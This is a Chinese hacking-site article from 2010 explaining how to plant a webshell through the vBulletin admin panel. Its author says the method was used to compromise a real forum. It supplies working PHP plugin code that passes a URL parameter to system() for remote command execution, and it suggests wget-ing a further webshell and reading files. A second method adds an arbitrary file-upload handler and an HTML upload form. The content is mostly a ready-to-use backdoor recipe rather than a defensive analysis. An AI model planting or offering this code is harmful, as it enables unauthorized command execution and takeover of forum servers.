您没有来错地!为了更好的发展,黑基网已于9月19日正式更名为【安基网】,域名更换为www.safebase.cn,请卸载旧的APP并安装新的APP,给您带来不便,敬请理解!谢谢

黑基Web安全攻防班
安基网 首页 IT技术 安全攻防 查看内容

vBulletin后台拿webshell

2010-2-1 15:29| 投稿: security

摘要:     by Jk7ose     今天把看雪搞了,用的vBulletin,国内貌似还没相关后台拿webshell的文章,翻墙出去E文了一...
    by Jk7ose     今天把看雪搞了,用的vBulletin,国内貌似还没相关后台拿webshell的文章,翻墙出去E文了一把,做个记录。。     方法一:首先在“插件和产品”(Plugins and Products)下边选择插件管理(Plugin Manager),然后右边选择添加新插件(Add New Plugin),在“Hook Location”(不知道杂翻译)处选择ajax_complete,Title处随便写,比如JK7OSE,然后关键的地方到了“Plugin PHP Code”(插件PHP代码),输入if(isset($_GET[’jkrose’])){echo "<h1>jkrose</h1><pre>"; system($_GET[’jkrose’]);exit;}注意,是去掉PHP的<? ?>标记的,这样就算完成了,利用时只需ajax.php?jkrose=cmd命令,可以wget一个webshell,可以ls -la,cat filename等YY的事。     方法二:前边相同,代码处写一个接收上传的代码:     $target_path = "images/avatars"; //注意权限要为可写的     $target_path = $target_path . basename( $_FILES[’uploadedfile’][’name’]);     if(move_uploaded_file($_FILES[’uploadedfile’][’tmp_name’], $target_path)) {     echo "The file ". basename( $_FILES[’uploadedfile’][’name’]).     " has been uploaded";     } else{     echo "There was an error uploading the file, please try again!";     }     然后访问ajax.php会提示“No input File Specified”之类的,如果没出现的话那肯定时哪有问题了,如果出现了就继续下边的,在网站随便某个地方,只要能写HTML代码就行,写个上传,比如说模板编辑那些地方,写个上传代码:     <form enctype="multipart/form-data" action="ajax.php" method="POST">     <input type="hidden" name="MAX_FILE_SIZE" value="100000" />     Choose a file to upload: <input name="uploadedfile" type="file" /><br />     <input type="hidden" name="s" value="$session[sessionhash]" />     <input type="hidden" name="securitytoken" value="$bbuserinfo[securitytoken]" />     <input type="submit" value="Upload File" />     </form>     保存就完工了,最后如果时新添加的风格的话,要在网站左下角切换过来才能用

小编推荐:欲学习电脑技术、系统维护、网络管理、编程开发和安全攻防等高端IT技术,请 点击这里 注册黑基账号,公开课频道价值万元IT培训教程免费学,让您少走弯路、事半功倍,好工作升职加薪!



免责声明:本文由投稿者转载自互联网,版权归原作者所有,文中所述不代表本站观点,若有侵权或转载等不当之处请联系我们处理,让我们一起为维护良好的互联网秩序而努力!联系方式见网站首页右下角。


鲜花

握手

雷人

路过

鸡蛋

相关阅读

最新评论

最新

返回顶部